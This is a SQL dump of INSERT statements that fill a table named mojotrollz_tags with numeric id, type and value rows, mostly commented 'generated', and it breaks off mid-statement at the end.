INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3246, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3249, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3251, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3252, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3253, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3254, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3256, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3258, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3260, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3262, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3264, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3266, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3270, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3276, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3286, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3290, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3296, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3298, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3301, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3303, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3306, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3307, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3308, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3310, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3311, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3314, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3315, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3523, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3524, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3525, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3636, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3637, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3638, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3639, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3640, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3642, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3643, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3644, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3646, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3656, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3658, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3659, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3660, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3661, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3662, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3685, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3689, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3690, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3691, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3693, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3694, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3695, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3703, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3703, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3704, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3704, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3705, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3706, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3707, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3715, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3716, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3717, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3718, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3719, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3722, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3723, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3724, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3725, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3726, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3727, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3729, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3730, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3737, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3740, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3760, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3761, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3763, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3764, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3767, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3768, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3769, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3770, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3772, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3797, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3798, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3799, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3800, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3801, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3802, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3803, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3804, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3815, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3816, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3817, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3818, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3819, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3832, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3832, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3833, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3833, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3834, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3834, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3835, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3835, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3836, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3836, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3837, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3837, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3838, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3838, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3839, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3840, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3841, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3842, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3843, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3844, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3845, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3847, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3848, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3849, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3850, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3851, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3852, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3853, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3855, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3856, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3857, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3888, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3890, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3891, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3892, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3893, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3894, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3895, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3896, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3897, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3898, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3899, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3900, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3901, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3902, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3903, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3904, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3905, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3906, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3907, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3908, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3909, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3910, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3911, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3936, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3937, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3938, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3939, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3940, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3941, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3942, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3943, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3944, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3945, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3946, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3947, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3948, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3949, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3950, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3951, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3960, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3962, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3963, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3964, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3967, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3968, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3972, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4004, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4072, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4087, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4088, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4089, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4090, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4096, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4097, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4098, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4099, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4100, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4101, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4102, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4103, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4104, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4105, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4106, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4115, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4116, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4117, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4118, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4119, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4120, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4121, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4122, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4123, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4132, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4133, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4134, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4135, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4136, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4137, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4138, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4141, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4149, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4166, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4170, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4171, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4406, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4608, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5619, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5620, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5621, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5622, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6286, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6287, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6288, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6289, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6290, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6291, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6292, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6751, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6752, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6906, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6907, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6908, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7510, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7923, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9630, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9847, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10082, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10083, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10192, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10193, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10194, 2, 1, 0, 'generated'); INSERT INTO 